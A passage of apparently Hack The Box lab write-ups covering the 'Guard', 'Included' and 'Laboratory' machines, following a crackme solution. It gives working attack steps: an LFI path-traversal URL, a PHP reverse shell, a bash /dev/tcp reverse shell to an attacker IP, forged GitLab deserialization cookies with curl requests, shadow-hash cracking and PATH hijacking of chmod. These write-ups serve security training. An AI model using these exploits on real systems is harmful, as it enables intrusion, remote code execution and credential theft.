| 45 | Let's print the content of those registers (you can also simply hover over the registers to see the values) 46 | 47 | ![](pics/passwordcompare.png) 48 | 49 | Our input `test` is compared to `fortran!`. Based on this comparison, we receive either the `Good Job` or `Wrong Password` message. So `fortran!` must be the correct password then. 50 | 51 | To verify this, we can start the program again and insert `fortran!` as the password. 52 | 53 | ![](pics/gj.png) 54 | 55 | There we go, we got the correct password! -------------------------------------------------------------------------------- /FindTheEasyPass/pics/easypassexe.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/FindTheEasyPass/pics/easypassexe.png -------------------------------------------------------------------------------- /FindTheEasyPass/pics/gj.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/FindTheEasyPass/pics/gj.png -------------------------------------------------------------------------------- /FindTheEasyPass/pics/graph.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/FindTheEasyPass/pics/graph.png -------------------------------------------------------------------------------- /FindTheEasyPass/pics/ida.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/FindTheEasyPass/pics/ida.png -------------------------------------------------------------------------------- /FindTheEasyPass/pics/location.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/FindTheEasyPass/pics/location.png -------------------------------------------------------------------------------- /FindTheEasyPass/pics/passwordcompare.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/FindTheEasyPass/pics/passwordcompare.png -------------------------------------------------------------------------------- /FindTheEasyPass/pics/passwordfunction.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/FindTheEasyPass/pics/passwordfunction.png -------------------------------------------------------------------------------- /FindTheEasyPass/pics/registers.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/FindTheEasyPass/pics/registers.png -------------------------------------------------------------------------------- /FindTheEasyPass/pics/wrongpassword.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/FindTheEasyPass/pics/wrongpassword.png -------------------------------------------------------------------------------- /Guard/README.md: -------------------------------------------------------------------------------- 1 | # Starting Point - Guard 2 | 3 | ## Enumeration 4 | 5 | ``` 6 | rustscan 10.10.10.50 -- -sC -sV -o port_scans 7 | 8 | PORT STATE SERVICE REASON VERSION 9 | 22/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) 10 | | ssh-hostkey: 11 | | 2048 2a:64:23:e0:a7:ec:1d:3b:f0:63:72:a7:d7:05:57:71 (RSA) 12 | | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCkcOfIguCL3HiluPAL9xLs0SKg0qvvnkO6iBLb/l9rmrN2ECvvce+E8S2gyZdm4pcgOBWfCYrwVPLxvc8nvpPZPSZ1LGfW5eoGwHdklIGAMgD0QtcphvoUuYowb+ZKNoXgq3Cj3EBP49HYHuHdYTQrWkzIJxKcOKQhX6Z4ayJxVL4jwUMKSVmn9kil5LvB4rrQNA4nnhF5F2LgCLBc/3clgwf+gPep6OLq0xuIf5S0bUTKZ/1Okg6dOxcIc2P3SRYxYyhfr8lP8g4/fid2seamTv9rmE3ilQq0iBj4fnVlY5jzI5m6EOGwdM84OiXsJZmHEPDwDcqmaMhYec1U953R 13 | | 256 b3:86:5d:3d:c9:d1:70:ea:d6:3d:36:a6:c5:f2:be:5d (ECDSA) 14 | | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMX3kqpY2ndXnsNY12RKRvy9tI69L4rrhFk1vims0B37Ju5YZ4Q5N+RV/ts7rvuKwUueCeH0AWEmE9oV3TsSG3k= 15 | | 256 c0:5b:13:0f:d6:e6:d1:71:2d:55:e2:4a:e2:27:0e:c2 (ED25519) 16 | |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJ9AJZ5v4FPferUM/c7u+T8W9N8zrGAjanwazh65aZnP 17 | Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel 18 | ``` 19 | 20 | Apparently, only the SSH port is open. As we have no other information given and previous machines have shown, that information from other machines must be re-used, we can try to connect as daniel (as we have his private ssh key). 21 | 22 | And it works! We are user `daniel` 23 | 24 | ``` 25 | daniel@guard:~$ id 26 | uid=1000(daniel) gid=1000(picasso) groups=1000(picasso),27(sudo) 27 | ``` 28 | 29 | ## Exploitation 30 | 31 | Having access to Daniel's home directory, we can directly read the user flag. But hmmm ... somehow `cat` does not give any output. It seems like we have some restrictions. However, `more` works perfectly fine. User flag: `209333652507f89d0d3a41ff4070c081` 32 | 33 | 34 | Let's look for some privilege escalation! 35 | 36 | We start by searching for files with SUID bit set: 37 | 38 | ``` 39 | daniel@guard:~$ find / -perm -u=s -type f 2>/dev/null 40 | -rbash: /dev/null: restricted: cannot redirect output 41 | ``` 42 | 43 | Weird! Something strange is happening with our shell. Let's investigate that. 44 | 45 | Looking at the `/etc/passwd` file, we can see that our current user has `rbash` as default shell. 46 | 47 | ``` 48 | daniel:x:1000:1000:picasso:/home/picasso:/bin/rbash 49 | ``` 50 | 51 | As I've personally never heard of it, I must first understand what this is and do some research. 52 | 53 | ``` 54 | RBASH(1) General Commands Manual RBASH(1) 55 | 56 | NAME 57 | rbash - restricted bash, see bash(1) 58 | 59 | RESTRICTED SHELL 60 | If bash is started with the name rbash, or the -r option is supplied at invocation, the shell becomes restricted. A restricted shell is used to set up an environment 61 | more controlled than the standard shell. It behaves identically to bash with the exception that the following are disallowed or not performed: 62 | 63 | · changing directories with cd 64 | 65 | · setting or unsetting the values of SHELL, PATH, ENV, or BASH_ENV 66 | 67 | · specifying command names containing / 68 | 69 | · specifying a filename containing a / as an argument to the . builtin command 70 | 71 | · specifying a filename containing a slash as an argument to the -p option to the hash builtin command 72 | 73 | · importing function definitions from the shell environment at startup 74 | 75 | · parsing the value of SHELLOPTS from the shell environment at startup 76 | 77 | · redirecting output using the >, >|, <>, >&, &>, and >> redirection operators 78 | 79 | · using the exec builtin command to replace the shell with another command 80 | 81 | · adding or deleting builtin commands with the -f and -d options to the enable builtin command 82 | 83 | · using the enable builtin command to enable disabled shell builtins 84 | 85 | · specifying the -p option to the command builtin command 86 | 87 | · turning off restricted mode with set +r or set +o restricted. 88 | 89 | These restrictions are enforced after any startup files are read. 90 | 91 | When a command that is found to be a shell script is executed, rbash turns off any restrictions in the shell spawned to execute the script 92 | ``` 93 | 94 | Apparently, that is some kind of restricted shell, that's highly limiting our functionalities. 95 | 96 | However, it does not prevent us from spawning a bash shell from within another program. I first tried it from within vim/vi, but it's disabled. Then I remembered a cool trick from the [OverTheWire Bandit](https://overthewire.org/wargames/bandit/) Wargame. If you manage to make your terminal as small as possible and open anything with `more`, then you get following: 97 | 98 | ![](pics/more_trick.png) 99 | 100 | From here, you can execute commands as such: 101 | 102 | ![](pics/command_more.png) 103 | 104 | And now we've escaped the rbash environment! 105 | 106 | ``` 107 | daniel@guard:~$ cd .. 108 | daniel@guard:/home$ pwd 109 | /home 110 | daniel@guard:/home$ 111 | ``` 112 | 113 | (The official writeup does it with the `man man` trick and spawns the bash from within there) 114 | 115 | Enumerating the system, I found some interesting backups in the `/backups` directory, namely a backup of the shadow file, for which we have read permissions. 116 | 117 | ``` 118 | root:$6$KIP2PX8O$7VF4mj1i.w/.sIOwyeN6LKnmeaFTgAGZtjBjRbvX4pEHvx1XUzXLTBBu0jRLPeZS.69qNrPgHJ0yvc3N82hY31:18334:0:99999:7::: 119 | daniel:$6$2EEJjgy86KrZ.cbl$oCf1MzIsN7N9KziBNo7uYrHLueZLM7wySrsFYxlNtO5NVhfVsyWCSKiIURNUxOOwC0tm1kyQsiv93imCwLM0k1:18326:0:99999:7::: 120 | ``` 121 | 122 | Let's copy it to our local machine and let `john` try to crack the passwords for daniel, or in the best case for root. If we get the password for daniel, then we can atleast check if he is on the sudoers list and can execute some helpful commands that we can exploit to gain root privileges. 123 | 124 | But it's better than we thought. John is successful in cracking the root password! 125 | 126 | ``` 127 | $ john shadow -w=/usr/share/wordlists/rockyou.txt 128 | Using default input encoding: UTF-8 129 | Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x]) 130 | Cost 1 (iteration count) is 5000 for all loaded hashes 131 | Press 'q' or Ctrl-C to abort, almost any other key for status 132 | 133 | password#1 (root) 134 | ``` 135 | 136 | Now we can log in as root and obtain the root flag. 137 | 138 | Root flag: `386ca63de3e5fd7df6b6212a0430f681` -------------------------------------------------------------------------------- /Guard/pics/command_more.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Guard/pics/command_more.png -------------------------------------------------------------------------------- /Guard/pics/more_trick.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Guard/pics/more_trick.png -------------------------------------------------------------------------------- /Included/README.md: -------------------------------------------------------------------------------- 1 | # Starting Point - Included 2 | 3 | ## Enumeration 4 | 5 | ``` 6 | rustscan 10.10.10.55 -- -sC -sV -o port_scan 7 | 8 | PORT STATE SERVICE REASON VERSION 9 | 80/tcp open http syn-ack Apache httpd 2.4.29 ((Ubuntu)) 10 | | http-methods: 11 | |_ Supported Methods: GET HEAD POST OPTIONS 12 | |_http-server-header: Apache/2.4.29 (Ubuntu) 13 | | http-title: Site doesn't have a title (text/html; charset=UTF-8). 14 | |_Requested resource was http://10.10.10.55/?file=index.php 15 | ``` 16 | So apparently only a single port is open. It's exposing an Apache webserver. Let's take a look at it. 17 | 18 | ### Examine Port 80 - Apache Server 19 | 20 | ![](pics/website.png) 21 | 22 | Looking at the URL and having the name of the challenge in mind (`Included`), an experienced web penetration tester might directly think of Local File Inclusion (LFI). 23 | 24 | And indeed! Changing the URL to 25 | ``` 26 | http://10.10.10.55/?file=../../../../../../../../etc/passwd 27 | ``` 28 | reveals the `/etc/passwd` file of the server. 29 | 30 | ![](pics/etc_passwd.png) 31 | 32 | Now we check if we can also access `/proc/self/environ`. This file hosts the initial environment of the Apache process. Thus, the environmental variable User-Agent is likely to appear there. If we can access it, then we can easily create a reverse shell by injecting php code as e.g. the User-Agent in our request to the server (=Proc Environ Injection). Unfortunately, we cannot access it. 33 | 34 | Another possibility would be to access `/var/log/apache2/access.log` after we sent a request to the website with PHP code as file parameter. The PHP code would then be executed, when loading the log file (=Log Poisoning). However, that's also not possible. Therefore, we need another technique. 35 | 36 | A blog article with details about the various techniques can be found [here](https://outpost24.com/blog/from-local-file-inclusion-to-remote-code-execution-part-1). 37 | 38 | I was pretty much stuck at this point. So I went through all the enumeration steps again. Thereby, I noticed, that `rustscan` does not support UDP port scanning at the time I'm writing this (https://github.com/RustScan/RustScan/issues/22). 39 | 40 | Therefore, I ran the nmap scan again, but this time with a UDP scan: 41 | 42 | ``` 43 | sudo nmap -sU 10.10.10.55 44 | 45 | PORT STATE SERVICE 46 | 69/udp open|filtered tftp 47 | ``` 48 | 49 | That's perfect for our LFI! We can now upload files to `/var/lib/tftpboot` (which is the default location), due to the misconfigured TFTP service (--create, -c 50 | Allow new files to be created. By default, tftpd will only allow upload of files that already exist. Files are created with default permissions allowing anyone to read or write them, unless the --permissive or --umask options are specified.) 51 | 52 | So now we can upload a php file that contains code for a reverse shell to our machine. Afterwards, we will execute the file by loading it with our LFI vulnerability. 53 | 54 | For the PHP Shell, we use the Shell from Pentestmonkey (which is pretty much the standard when it comes to PHP reverse shells). We upload it with 55 | 56 | ``` 57 | tftp 10.10.10.15 58 | 59 | put shell.php 60 | ``` 61 | 62 | Now start the listener `nc -lvpn 4444` and include the file by accessing following page: 63 | 64 | ``` 65 | http://10.10.10.55/?file=../../../../../var/lib/tftpboot/shell.php 66 | ``` 67 | 68 | ![](pics/reverse_shell.png) 69 | 70 | ## Exploitation 71 | 72 | After several hours of research, I again had to take a look at the writeup, as I could not find any vulnerability on the system. And indeed! There is no vulnerability. The writeup simply says "The password Sheffield19 found in the previous can be used to switch to mike"... Like seriously, come on... Again one of those "we found the password in any of the previous machines for a completely unrelated user. It's obvious that you should use this password here as well". **FACEPALM** But w/e.... 73 | 74 | Now that we are user `mike`, we can look for a way to escalate our privileges. But first let's retrieve the user flag: `a56ef91d70cfbf2cdb8f454c006935a1` 75 | 76 | Running the command `id`, we see that mike is in the group `lxc`. Following [this article](https://book.hacktricks.xyz/linux-unix/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation), on how to obtain root privileges by abusing the `security.privileged=true` feature of lxc, we get root accces. 77 | 78 | ## Post-Exploitation 79 | In the root directory there are two files: 80 | - root.txt: `c693d9c7499d9f572ee375d4c14c7bcf` 81 | - login.sql: `Daniel:>SNDv*2wzLWf` (credentials for another machine) -------------------------------------------------------------------------------- /Included/pics/etc_passwd.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Included/pics/etc_passwd.png -------------------------------------------------------------------------------- /Included/pics/reverse_shell.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Included/pics/reverse_shell.png -------------------------------------------------------------------------------- /Included/pics/website.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Included/pics/website.png -------------------------------------------------------------------------------- /Laboratory/README.md: -------------------------------------------------------------------------------- 1 | ![](pics/logo.png) 2 | 3 | # Laboratory (Linux) 4 | 5 | ## Enumeration 6 | 7 | ``` 8 | rustscan --ulimit 5000 10.129.83.28 -- -sC -sV -o port_scans 9 | 10 | PORT STATE SERVICE REASON VERSION 11 | 22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0) 12 | 80/tcp open http syn-ack Apache httpd 2.4.41 13 | 443/tcp open ssl/http syn-ack Apache httpd 2.4.41 ((Ubuntu)) 14 | Service Info: Host: laboratory.htb; OS: Linux; CPE: cpe:/o:linux:linux_kerne 15 | ``` 16 | 17 | ### Examine Port 80 - Apache server 18 | 19 | ![](pics/main_website.png) 20 | 21 | On the website itself, we can't find anything interesting. No functionalities, no links. Everything is just pure plaintext. So let's see if we can find some directories. 22 | 23 | ``` 24 | └──╼ $ gobuster dir -u "https://laboratory.htb" -w /usr/share/wordlists/dirb/big.txt -x php,html -k 25 | =============================================================== 26 | Gobuster v3.0.1 27 | by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) 28 | =============================================================== 29 | [+] Url: https://laboratory.htb 30 | [+] Threads: 10 31 | [+] Wordlist: /usr/share/wordlists/dirb/big.txt 32 | [+] Status codes: 200,204,301,302,307,401,403 33 | [+] User Agent: gobuster/3.0.1 34 | [+] Extensions: php,html 35 | [+] Timeout: 10s 36 | =============================================================== 37 | 2021/01/21 15:59:09 Starting gobuster 38 | =============================================================== 39 | /.htaccess (Status: 403) 40 | /.htaccess.php (Status: 403) 41 | /.htaccess.html (Status: 403) 42 | /.htpasswd (Status: 403) 43 | /.htpasswd.php (Status: 403) 44 | /.htpasswd.html (Status: 403) 45 | /assets (Status: 301) 46 | /images (Status: 301) 47 | /index.html (Status: 200) 48 | /server-status (Status: 403) 49 | =============================================================== 50 | 2021/01/21 16:03:32 Finished 51 | =============================================================== 52 | ``` 53 | 54 | However, gobuster only discovers the typical standard directories. After investigating them, I still have no idea where to go from here. So I ran the nmap scan again. This time with basic scripts activated. 55 | 56 | Additionally to the previous output we also get more information about the domain. 57 | 58 | ``` 59 | | ssl-cert: Subject: commonName=laboratory.htb 60 | | Subject Alternative Name: DNS:git.laboratory.htb 61 | | Issuer: commonName=laboratory.htb 62 | ``` 63 | 64 | So apparently, there is also a subdomain called `git.laboratory.htb`. Let's add it to the hosts file and check it out. 65 | 66 | 67 | ### Examine Port 443 - Subdomain 68 | 69 | ![](pics/git_server.png) 70 | 71 | Looking at the subdomain, we can see a GitLab server login page. As we don't have any credentials, the only possible way is to create an account. 72 | 73 | After creating an account (with a laboratory.htb email address), we have access to GitLab. 74 | 75 | ![](pics/git_logged_in.png) 76 | 77 | Browsing through the available projects, we quickly find the "SecureWebsite" Project. 78 | 79 | ![](pics/project.png) 80 | 81 | However, the project does not give any valuable information. Atleast nothing that we do not already know. What about software issues in the server itself? Let's find out what version the server is. 82 | 83 | A quick check in google reveals that we can get the server version by navigating to `https://your.domain.name/help` 84 | so `https://git.laboratory.htb/help` in our case. 85 | 86 | ![](pics/help.png) 87 | 88 | Server version 12.8.1. Now let's see if this specific version has any security flaws. And indeed! Searching for this version results in hundreds of hits for "File Read Remote Code Execution". 89 | 90 | *This module provides remote code execution against GitLab Community Edition (CE) and Enterprise Edition (EE). It combines an arbitrary file read to extract the Rails "secret_key_base", and gains remote code execution with a deserialization vulnerability of a signed 'experimentation_subject_id' cookie that GitLab uses internally for A/B testing. Note that the arbitrary file read exists in GitLab EE/CE 8.5 and later, and was fixed in 12.9.1, 12.8.8, and 12.7.8. However, the RCE only affects versions 12.4.0 and above when the vulnerable `experimentation_subject_id` cookie was introduced. Tested on GitLab 12.8.1 and 12.4.0. (https://www.rapid7.com/db/modules/exploit/multi/http/gitlab_file_read_rce/)* 91 | 92 | A detailed article about the vulnerability can be found [here](https://hackerone.com/reports/827052). 93 | 94 | ## Gaining an Initial Foothold 95 | 96 | We can simply follow the instructions of the CVE report. 97 | 98 | It says that LFI is possible when including the file in an issue in one project and then move the issue to another project. The specified file will then be included, as the LFI prevention apparently does not happen when moving issues. 99 | 100 | So let's try if it works: we include /etc/passwd and create the issue in Project 1. 101 | 102 | ![](pics/issue.png) 103 | 104 | Now we move the issue to Project 2. 105 | 106 | ![](pics/move_issue.png) 107 | 108 | And indeed! We get access to the file! Amazing! 109 | 110 | ![](pics/vulnerability.png) 111 | 112 | ![](pics/etc_passwd.png) 113 | 114 | In order to get RCE from the LFI, we first have to leak the `secrets.yml` file of the gitlab server. To do that we simply repeat the LFI steps as shown above with a different file included: 115 | 116 | ``` 117 | ![a](/uploads/11111111111111111111111111111111/../../../../../../../../../../../../../../opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml) 118 | ``` 119 | 120 | Perfect! Now that we have the secrets file, we can setup our gitlab locally (this is not necessarily needed, but helps for the next steps): 121 | 122 | So I installed gitlab locally by following these steps: 123 | 1) Download gitlab 124 | https://packages.gitlab.com/gitlab/gitlab-ce/packages/debian/stretch/gitlab-ce_12.8.10-ce.0_amd64.deb 125 | 2) sudo dpkg -i download.deb 126 | 3) sudo gitlab-ctl reconfigure 127 | 128 | Afterwards, I replaced the secret key of my local secret.yml file with the one from the leaked file. 129 | 130 | Now we create a reverse shell script that should be uploaded to the gitlab server (don't forget to change the IP and the port): 131 | 132 | Reverse shell: 133 | ``` 134 | └──╼ $ cat rev_shell.sh 135 | #!/bin/bash 136 | 137 | bash -i >& /dev/tcp/10.10.14.26/4444 0>&1 138 | ``` 139 | 140 | Afterwards, start a local HTTP server. 141 | ``` 142 | sudo python3 -m http.server 8888 143 | ``` 144 | 145 | The next step is to open the `gitlab-rails console` and execute following code. It will create a cookie that we can then inject as the `experimentation_subject_id`: 146 | ``` 147 | request = ActionDispatch::Request.new(Rails.application.env_config) 148 | request.env["action_dispatch.cookies_serializer"] = :marshal 149 | cookies = request.cookie_jar 150 | 151 | erb = ERB.new("<%= `curl 10.10.14.26:8888/rev_shell.sh -o /tmp/rev_shell.sh` %>") 152 | depr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new(erb, :result, "@result", ActiveSupport::Deprecation.new) 153 | cookies.signed[:cookie] = depr 154 | puts cookies[:cookie] 155 | ``` 156 | 157 | Copy the output cookie and execute following to upload the reverse shell to the gitlab server: 158 | 159 | ``` 160 | curl -vvv 'https://git.laboratory.htb/users/sign_in' -b 161 | "experimentation_subject_id=BAhvOkBBY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbjo6RGVwcmVjYXRlZEluc3RhbmNlVmFyaWFibGVQcm94eQk6DkBpbnN0YW5jZW86CEVSQgs6EEBzYWZlX2xldmVsMDoJQHNyY0kiYiNjb2Rpbmc6VVRGLTgKX2VyYm91dCA9ICsnJzsgX2VyYm91dC48PCgoIGBlY2hvIHZha3p6IHdhcyBoZXJlID4gL3RtcC92YWt6emAgKS50b19zKTsgX2VyYm91dAY6BkVGOg5AZW5jb2RpbmdJdToNRW5jb2RpbmcKVVRGLTgGOwpGOhNAZnJvemVuX3N0cmluZzA6DkBmaWxlbmFtZTA6DEBsaW5lbm9pADoMQG1ldGhvZDoLcmVzdWx0OglAdmFySSIMQHJlc3VsdAY7ClQ6EEBkZXByZWNhdG9ySXU6H0FjdGl2ZVN1cHBvcnQ6OkRlcHJlY2F0aW9uAAY7ClQ=--256736af5cceb9bd73bbf17bfa3bf64985ac5767" -k 162 | ``` 163 | 164 | Afterwards craft another cookie, which contains the command to execute the script. 165 | 166 | ``` 167 | request = ActionDispatch::Request.new(Rails.application.env_config) 168 | request.env["action_dispatch.cookies_serializer"] = :marshal 169 | cookies = request.cookie_jar 170 | 171 | erb = ERB.new("<%= `bash /tmp/rev_shell.sh` %>") 172 | depr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new(erb,:result, "@result", ActiveSupport::Deprecation.new) 173 | cookies.signed[:cookie] = depr 174 | puts cookies[:cookie] 175 | ``` 176 | 177 | Now set up a nc listener, copy the cookie and do the request: 178 | 179 | ``` 180 | curl -vvv 'https://git.laboratory.htb/users/sign_in' -b "experimentation_subject_id=BAhvOkBBY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbjo6RGVwcmVjYXRlZEluc3RhbmNlVmFyaWFibGVQcm94eQk6DkBpbnN0YW5jZW86CEVSQgs6EEBzYWZlX2xldmVsMDoJQHNyY0kiWCNjb2Rpbmc6VVRGLTgKX2VyYm91dCA9ICsnJzsgX2VyYm91dC48PCgoIGBiYXNoIC90bXAvcmV2X3NoZWxsLnNoYCApLnRvX3MpOyBfZXJib3V0BjoGRUY6DkBlbmNvZGluZ0l1Og1FbmNvZGluZwpVVEYtOAY7CkY6E0Bmcm96ZW5fc3RyaW5nMDoOQGZpbGVuYW1lMDoMQGxpbmVub2kAOgxAbWV0aG9kOgtyZXN1bHQ6CUB2YXJJIgxAcmVzdWx0BjsKVDoQQGRlcHJlY2F0b3JJdTofQWN0aXZlU3VwcG9ydDo6RGVwcmVjYXRpb24ABjsKVA==--874f307ee34f95c27d0a9e79ba1900960d8d02e1" -k 181 | ``` 182 | 183 | This will execute the reverse shell and you have access to the server! 184 | 185 | ``` 186 | git@git:~/gitlab-rails/working$ hostname && id 187 | git.laboratory.htb 188 | uid=998(git) gid=998(git) groups=998(git) 189 | ``` 190 | 191 | After some minutes of exploring the server, I realized that the git server has nothing interesting hidden. At least no flags that we can submit to HTB. So now, we somehow have gain access to the real server instead of just having access to the git server. 192 | 193 | In the official [GitLab Docs](https://docs.gitlab.com/ee/administration/troubleshooting/navigating_gitlab_via_rails_console.html), they explain how to use the gitlab-rails console to find users, change passwords and save the changes to the live server. We can use this to find existing users on the Gitlab server and then gain access to their accounts. Maybe they have some valuable information on their profiles. Let's follow the instructions of the docs. 194 | 195 | ``` 196 | irb(main):001:0> user = User.find(1) 197 | user = User.find(1) 198 | => # 199 | 200 | irb(main):002:0> user.password = 'password' 201 | user.password = 'password' 202 | => "password" 203 | 204 | irb(main):003:0> user.save 205 | user.save 206 | Enqueued ActionMailer::DeliveryJob (Job ID: 45e0541c-9976-41d5-a6da-02db29294bc7) to Sidekiq(mailers) with arguments: "DeviseMailer", "password_change", "deliver_now", #> 207 | => true 208 | ``` 209 | 210 | Now going back to `git.laboratory.htb`, we can login as `dexter` with the password `password` 211 | 212 | ![](pics/dexter_gitlab.png) 213 | 214 | Going through his private respositories, we can find his private ssh key: 215 | 216 | ![](pics/dexter_sshkey.png) 217 | 218 | Using this, we can successfully login to his account on `laboratory.htb`. 219 | 220 | ``` 221 | dexter@laboratory:~$ hostname && id 222 | laboratory 223 | uid=1000(dexter) gid=1000(dexter) groups=1000(dexter) 224 | ``` 225 | 226 | ## Privilege Escalation 227 | 228 | We start by using the standard priv-esc techniques such as finding binaries with the SUID bit set. 229 | 230 | ``` 231 | find / -perm -4000 -type f 2>/dev/null 232 | 233 | /usr/local/bin/docker-security 234 | /usr/bin/sudo 235 | /usr/bin/newgrp 236 | /usr/bin/su 237 | ``` 238 | 239 | The binary `/usr/local/bin/docker-security` seems to be suspicious as it is usually not part of this list. So let's check it out. 240 | 241 | ``` 242 | -rwsr-xr-x 1 root dexter 16720 Aug 28 14:52 /usr/local/bin/docker-security 243 | ``` 244 | 245 | So our current user has permissions to execute it! Great. Let's do it and see what happens.... Nothing... hmm. Then we have to figure out what it does. But instead of reverse engineering it locally with some disassembler, we can start by running things like `ltrace` and `strace` to get a first idea of what is going on. 246 | 247 | ``` 248 | dexter@laboratory:/usr/local/bin$ ltrace docker-security 249 | setuid(0) = -1 250 | setgid(0) = -1 251 | system("chmod 700 /usr/bin/docker"chmod: changing permissions of '/usr/bin/docker': Operation not permitted 252 | 253 | --- SIGCHLD (Child exited) --- 254 | <... system resumed> ) = 256 255 | system("chmod 660 /var/run/docker.sock"chmod: changing permissions of '/var/run/docker.sock': Operation not permitted 256 | 257 | --- SIGCHLD (Child exited) --- 258 | <... system resumed> ) = 256 259 | +++ exited (status 0) +++ 260 | ``` 261 | 262 | Apparently, the binary uses `chmod`. The issue with this is, that it does not use the absolute path. So we can create our own `chmod` and inject it into the path: 263 | 264 | ``` 265 | dexter@laboratory:/tmp$ echo "/bin/bash" > chmod 266 | dexter@laboratory:/tmp$ chmod +x chmod 267 | dexter@laboratory:/tmp$ export PATH=.:${PATH} 268 | ``` 269 | 270 | Now when we run the binary, the `chmod` call will be replaced by our chmod file, which contains /bin/sh. Let's run it! 271 | 272 | ``` 273 | dexter@laboratory:/tmp$ /usr/local/bin/docker-security 274 | root@laboratory:/tmp# hostname && id 275 | laboratory 276 | uid=0(root) gid=0(root) groups=0(root),1000(dexter) 277 | ``` 278 | 279 | Perfect! We pwned the machine! 280 | -------------------------------------------------------------------------------- /Laboratory/pics/dexter_gitlab.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Laboratory/pics/dexter_gitlab.png -------------------------------------------------------------------------------- /Laboratory/pics/dexter_sshkey.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Laboratory/pics/dexter_sshkey.png -------------------------------------------------------------------------------- /Laboratory/pics/etc_passwd.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Laboratory/pics/etc_passwd.png -------------------------------------------------------------------------------- /Laboratory/pics/git_logged_in.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Laboratory/pics/git_logged_in.png -------------------------------------------------------------------------------- /Laboratory/pics/git_server.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Laboratory/pics/git_server.png -------------------------------------------------------------------------------- /Laboratory/pics/help.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Laboratory/pics/help.png -------------------------------------------------------------------------------- /Laboratory/pics/issue.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Laboratory/pics/issue.png -------------------------------------------------------------------------------- /Laboratory/pics/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Laboratory/pics/logo.png -------------------------------------------------------------------------------- /Laboratory/pics/main_website.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Laboratory/pics/main_website.png -------------------------------------------------------------------------------- /Laboratory/pics/move_issue.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Laboratory/pics/move_issue.png -------------------------------------------------------------------------------- /Laboratory/pics/project.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Laboratory/pics/project.png -------------------------------------------------------------------------------- /Laboratory/pics/vulnerability.png: -------------------------------------------------------------------------------- 